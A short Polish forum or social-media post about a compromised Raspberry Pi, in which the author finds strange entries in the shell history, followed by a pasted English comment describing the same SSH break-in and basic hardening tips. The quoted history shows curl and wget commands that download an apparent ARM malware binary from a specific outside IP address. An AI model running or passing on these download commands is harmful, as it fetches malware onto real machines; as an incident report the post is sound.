#raspberrypi kurde, dziś troche zostałem zaskoczony. Z jednej strony głupota i lenistwo, a z drugiej nie spodziewałem się, że takie coś może się stać.Łączę się przez ssh i z racji tego, że nie dodałem jeszcze kilku procesów do uruchamiania przy boot'owaniu to history i szukam co tam było ostatnio odpalane co by nie musieć za dużo wpisywać. Jakie było moje zdziwienie gdy nagle zobaczyłem:
I have the same problem, and I found a file ARM in the./tmp. This is an executable file (129 860 bytes), and not just a script. You can study to get it in the current directory with the same command wget http://104.238.147.236/arm. Viewing logs in /var/logs/auth.log showed an attack on the port SSH. Change the port (default 22) in the ./etc/ssh/sshd_config on your own value. Change password for user PI. The attacks
675 curl -O http://104.238.147.236/arm
676 wget http://104.238.147.236/arm
677
Change the port (default 22) in the ./etc/ssh/sshd_config on your own value.
Change password for user PI.
The attacks